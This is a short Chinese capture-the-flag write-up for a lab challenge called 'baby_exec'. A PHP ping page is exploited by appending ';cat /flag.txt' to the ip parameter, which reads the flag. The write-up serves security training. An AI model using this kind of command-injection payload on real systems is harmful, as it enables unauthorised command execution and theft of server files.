WEB_baby_exec解析-摩杜云开发者社区

WEB_baby_exec解析

sD2jryIvwISv 2023年11月19日 68 0

打开环境发现

WEB_baby_exec解析_ctf

明显php代码,代码意义为ping一次地址

在后面加上

/?ip=1.1.1.1

WEB_baby_exec解析_linux命令_02

发现可以执行,那就可以使用;来进行注入

;是linux命令连续执行

在ip基础上加上

/?ip=1.1.1.1;cat /flag.txt

WEB_baby_exec解析_php代码_03

得到flag

flag{123124}

上一篇：你还在为SFTP连接超时而困惑么？ | 京东云技术团队下一篇：关于OSPF

最后一次编辑于 2023年11月19日 0

暂无评论

推荐阅读

不安全的URL跳转(Pikachu)

5NWiQFAVeqgX 2024年05月17日 49 0 0 网络安全

RCE(Pikachu)

5NWiQFAVeqgX 2024年05月17日 26 0 0 网络安全

Webshell流量分析之菜刀Chopper&蚁剑AntSword

Q68mX1P3tSGz 2024年05月17日 35 0 0 网络安全

记一些CISP-PTE题目解析

pTtIhLb24H2d 2024年05月17日 32 0 0 网络安全

不安全的文件上传(Pikachu)

5NWiQFAVeqgX 2024年05月17日 39 0 0 网络安全

Weblogic T3反序列化漏洞（CVE-2018-2628）

Q68mX1P3tSGz 2024年05月18日 54 0 0 网络安全

以数字守护汉字！天翼云TeleDB数据库获GB 18030最高级别认证！

1H97ZBKLEqYv 2024年05月17日 46 0 0 网络安全

MJUCTF—WP

OKgNPeBk991j 2024年05月18日 44 0 0 网络安全

Stratum挖矿协议&XMR挖矿流量分析

Q68mX1P3tSGz 2024年05月17日 46 0 0 网络安全

应急响应web1

rKgO6TN7xbYO 2024年05月17日 36 0 0 网络安全

文件处理漏洞--文件上传

6FqvcajNhQJV 2024年05月17日 44 0 0 网络安全

LoRa与NB-IoT两大低功耗通信技术对比

bjWM7EoKUTkK 2024年05月17日 32 0 0 网络安全

流量特征提取工具NFStream

Q68mX1P3tSGz 2024年05月17日 29 0 0 网络安全

SQL注入(pikachu)

5NWiQFAVeqgX 2024年05月17日 46 0 0 网络安全

CSRF(Pikachu靶场练习)

5NWiQFAVeqgX 2024年05月17日 33 0 0 网络安全

常回家看看之堆溢出

YOkriIV1Am1d 2024年05月20日 35 0 0 网络安全

BUUCTF-WEB(4-8)

owpmXY9hzjPv 2024年05月20日 34 0 0 网络安全

BUUCTF-WEB(15-20)

owpmXY9hzjPv 2024年05月20日 35 0 0 网络安全

“复兴杯”2023第四届大学生网络安全精英赛排位赛 Writeup

PbVHQ24cnMOg 2024年05月20日 26 0 0 网络安全

BUUCTF-WEB(9-14)

owpmXY9hzjPv 2024年05月20日 31 0 0 网络安全

sD2jryIvwISv

作者其他文章更多

WEB_baby_exec解析

2023-11-19